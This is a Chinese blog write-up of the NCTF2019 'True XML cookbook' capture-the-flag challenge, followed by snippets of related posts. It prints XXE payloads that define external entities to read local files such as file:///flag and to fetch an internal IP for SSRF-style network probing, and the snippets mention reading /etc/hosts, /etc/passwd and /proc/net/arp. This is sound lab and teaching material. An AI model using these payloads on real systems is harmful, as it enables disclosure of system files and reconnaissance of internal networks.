True XML cookbook

于 2024-08-23 21:20:42 发布
阅读量181 收藏 1
点赞数 1
文章标签: xml
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kw741951/article/details/141473936
版权

打开题目

看到登录口

随便输入admin,123456,然后抓包试一下

先按原来那道题的payload进行测试,payload和结果如下:

<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM  "file:///flag">
]>
<user>
    <username>&file;</username>
    <password>1</password>
</user>

未成功获取到flag信息,试着探测内网信息,读取下系统内的配置文件信息看是否能发现有用的信息

这里获得一个新的地址,尝试下进行连接结果如下:

<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM  "http://10.244.80.49/">
]>
<user>
    <username>&file;</username>
    <password>1</password>
</user>
 

连接失败,那就查询下同网段内存在不存在其他地址,使用bp的爆破模块进行爆破,设置如下:

扫描可得到flag

worker..
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[NCTF2019]True XML cookbook 1(XML)
weixin_45577185的博客
10-20 346
总结一下知识点: 抓包,插入恶意XML外部实体 /etc/hosts 储存域名解析的缓存 /etc/passwd 用户密码 /proc/net/arp 每个网络接口的arp表中dev包 直接用下面的代码读取flag会报错 <?xml version="1.0" ?> <!DOCTYPE note [ <!ENTITY M1kael SYSTEM "file:///flag"> ]> <user> <username>&M1kael;&lt
[NCTF2019]True XML cookbook
Yb_140的博客
11-09 537
XXE探测内网
[NCTF 2019]True XML cookbook
m0_70819573的博客
04-21 379
不能直接在根目录读取flag,但可以通过/etc/hosts获取内网。再通过扫描c段获得flag。
BUU [NCTF2019]True XML cookbook
qq_62078839的博客
04-19 1882
打开连接 熟悉的界面,我们就不做黑盒测试了,直接抓包修改xml payload:<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///flag"> ]> <user><username>&admin;</username><password>123456</passwo...
[NCTF2019]True XML cookbook 1
snowlyzz的博客
05-05 548
又是一道关于XML注入的题 xml语法: <?xml version="1.0" encoding="UTF-8"?> //xml声明 ​ <!DOCTYPE copyright [ //DTD(文档类型定义) ​ <!ELEMENT note (to,reset,login)> //定义元素 ​ <!ENTITY test SYSTEM "url"> //定义外部实体test ​ ]> 直接抓包! <...
[NCTF2019]True XML cookbook --不会编程的崽
不会编程的崽的博客
02-21 943
xxe ssrf 配合
BUUCTF WEB TRUE XML COOKBOOK
qq_41696858的博客
05-09 572
由于某种神秘的不可抗力,很久没更新了,emmmm。以后还是勤快一点吧 言归正转,这题都已经把提示给到脸上了,xml,这不试试xml注入? 经典登录界面,抓包就可以发现数据事宜xml形式的传往后台的 X-Requested-With: XMLHttpRequest 依旧推荐https://xz.aliyun.com/t/6887#toc-5 构造倒是没有多难,但这题最大的坑点在于flag不是在本地的,所以他是一个内网题。。。。 一个小经验:由于BUUCTF转用了K8S管理,他的靶机容器是随机在80,81两个网
Python Cookbook, 2nd Edition
05-17
Python Cookbook, 2nd Edition By David Ascher, Alex Martelli, Anna Ravenscroft Publisher : O'Reilly Pub Date : March 2005 ISBN : 0-596-00797-3 Pages : 844 Copyright Preface The ...
XSLT Cookbook
01-12
### XSLT Cookbook #### 一、Strings **1.1 测试字符串是否以另一个字符串结尾** 在XSLT中,测试一个字符串是否以特定字符序列结尾可以通过多种方式实现。例如,可以使用`substring`函数结合字符串长度进行比较。...
JavaScript.JSON.Cookbook.1785286900
08-11
This is especially true if you've been using XML to do the job because it's entirely possible that you could do much of the same work with less code and less data overhead in JSON. While the book's ...
【架构-24】XML和JSON
qq_45611002的博客
08-23 188
XML和JSON各有优势,选择哪种格式取决于具体的需求。如果需要灵活的、可扩展的结构,XML是个不错的选择;如果追求轻量级和高效性,尤其是在Web环境中,JSON则更为合适。
Maven的配置文件pom.xml标签详解(含常用plugin)
weixin_49999835的博客
08-23 560
一、什么是pom.xml pom.xml是Maven项目的核心配置文件,它是 项目对象模型 - Project Object Model(POM) 的缩写。POM定义了项目的所有属性,包括项目的名称、版本、依赖关系、构建配置等。使用pom.xml,我们可以轻松地管理项目的构建和依赖关系,让我们能够更专注于业务逻辑的开发。 二、pom.xml的结构 我们先看一个简单pom.xml的结构,首先和标签主要针对的是本pom.xml文件的格式,如下: <?xml version="1.0" encoding=
Spring 中FileSystemXmlApplicationContext
小湘西的博客
08-20 862
是 Spring Framework 中的一个重要类,位于包中。它是接口的实现,专门用于从文件系统中的 XML 配置文件加载 Spring bean 定义。与不同,它允许开发者从文件系统的任何路径访问配置文件,不仅限于类路径。
还在拼接字符串生成XML?(Java)
weixin_53132064的博客
08-23 390
选择FreeMarker还是DOM4J主要取决于具体需求。如果需要生成复杂的、动态的XML内容,FreeMarker是一个更好的选择;而对于简单的XML结构,DOM4J提供了一种快速、类型安全的方式。根据项目需求选择合适的工具,以提高开发效率和代码质量。
XML 实例:深入解析与实际应用
wjs2024的博客
08-22 437
XML 是一种强大且灵活的数据格式,广泛用于各种应用程序和行业中。通过自定义标签和结构,XML 提供了一种标准化方法来存储、传输和交换数据。随着技术的发展,XML 的应用范围不断扩大,包括但不限于网页开发、数据交换、网络服务和文档处理。
关于xml中存在特殊的转义字符,不能正常反序列化问题
最新发布
等待のL先森的博客
08-23 179
如果这些字符直接出现在xml文档中,而没有被转义,那么xml解析器可能就会误解他们的意思,比如,解析器可能错误的认为。使用Apache Commons Lang 中的。标志着·一个新的xml元素的开始。方法来转义XML字符串。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值